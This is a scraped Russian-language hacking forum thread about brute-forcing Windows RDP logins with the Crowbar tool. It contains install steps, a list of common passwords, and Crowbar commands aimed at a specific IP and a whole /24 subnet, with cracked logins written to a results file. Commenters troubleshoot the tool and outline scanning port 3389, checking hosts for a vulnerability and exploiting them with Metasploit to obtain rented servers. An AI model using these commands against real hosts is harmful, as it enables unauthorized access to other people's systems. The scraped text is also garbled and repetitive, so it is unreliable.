Спасибо за статью, один вопрос - зачем так усиленно прятать тестовый ip за звёздами, а потом показывать его на скрине?)
недосып?)
недосып?)
Следуйте инструкциям в видео ниже, чтобы узнать, как установить наш сайт как веб-приложение на главный экран вашего устройства.
Примечание: Эта функция может быть недоступна в некоторых браузерах.
# apt-get update
# apt-get install freerdp-x11
# xfreerdp --version
# xfreerdp --sec nla 185.154.13.84
# git clone https://github.com/galkan/crowbar
# cd crowbar
# chmod +x crowbar.py
# python crowbar.py --help
No module named pkg_resources
Решение проблемы с ошибкой No module named pkg_resources
ИлиКод:# yum -y update # yum -y install python-pip # pip install --upgrade pip
Опять пробуем запустить "Хелп"Код:# pip install --upgrade setuptools # pip install --upgrade distribute
Работает ))Код:# python crowbar.py --help
а также со списком предполагаемых паролей:Администратор
Administrator
admin
nimda
Запуск скрипта питон в скрипте башadmin
root
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
abc123
# python crowbar.py -b rdp -U login.txt -C pass.txt -s IP 185.1хх.13.хх/32 -o good.txt -n 100 -t 500 -v -d
# python crowbar.py -b rdp -U login.txt -C pass.txt -s 185.1хх.13.хх/24 -o good.txt -n 100 -t 500 -v -d
После окончания атаки просматриваем файл good.txt и обнаруживает, что тестовый дедик успешно сбручен.-b rdp - Целевая служба. Crowbar поддерживает vnckey, openvpn, sshkey, rdp.
-n 100 - Количество задействованных потоков
-S: </path/to/file> список IP для брута
-d: Запустить nmap для того, чтобы узнать, является ли порт открытым или нет.
-v: Подробный режим, который показывает все попытки, включая неудачу.
-o good.txt -Все логи включая положительные результаты записываются в файл good.txt
# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 185.1хх.13.хх
Статья читается полностью. Тезисы со ссылками на разделы появятся позже.
А я думал люди с такими возможностями которые изобрели этот скрипт , они есть как экстрасенсы .Проблема лишь в том, что на форуме нет ни одного экстрасенса.
Если хочешь получить реальный совет, потрудись обрисовать ситуацию подробнее, приложить логи, скриншоты.
-S: </path/to/file> which is stores target IP addressesКак я понимаю, просто по списку ip адресов данный скрипт не работает?
Я предположу что s маленькаяввожу команду :
python crowbar.py -b rdp -U /root/login.txt -C /root/pass.txt -S /root/ip3389.txt -o good3389.txt -n 100 -t 500 -v
Пишет : Invalid IP Address! Please use IP/CIDR notation <192.168.37.37/32, 192.168.1.0/24>
Как я понимаю список ip в таком формате:
193.1.1.123
193.1.1.124
193.1.1.125
скрипт не распознает?
Я предположу что s маленькая
Пишет : Invalid IP Address! Please use IP/CIDR notation <192.168.37.37/32, 192.168.1.0/24>
друг не до конца понял , что ты имеешь ввиду)) можешь разжевать?))Статья не плоха, в жизни пригодится но брут это долго и не надежно, тем более судя по коментам скрипт, увы сыроват... Да и банально, ждешь пока про брутит. Если бы мне нужны были дедики и т.д., я бы подошел к этому вопросу так..
Посмотреть вложение 14383
вот с этим уже веселее)) а с этим скриптом веселья больше прибавится )
удачи!
друг не до конца понял , что ты имеешь ввиду)) можешь разжевать?))
Статью бы от тебя, эх..Статья не плоха, в жизни пригодится но брут это долго и не надежно, тем более судя по коментам скрипт, увы сыроват... Да и банально, ждешь пока про брутит. Если бы мне нужны были дедики и т.д., я бы подошел к этому вопросу так..
Посмотреть вложение 14383
вот с этим уже веселее)) а с этим скриптом веселья больше прибавится )
удачи!
тестить нужно, дедики искать пробывать определить скриптом от нмапа на уязвимость указанную выше.... искать сначало по 3389 открытым потом прогоняешь через скрипт на наличие уязвимости и если она имеется, пробивать метасплойтом, все)Статью бы от тебя, эх..
тестить нужно, дедики искать пробывать определить скриптом от нмапа на уязвимость указанную выше.... искать сначало по 3389 открытым потом прогоняешь через скрипт на наличие уязвимости и если она имеется, пробивать метасплойтом, все)
Комментарии
33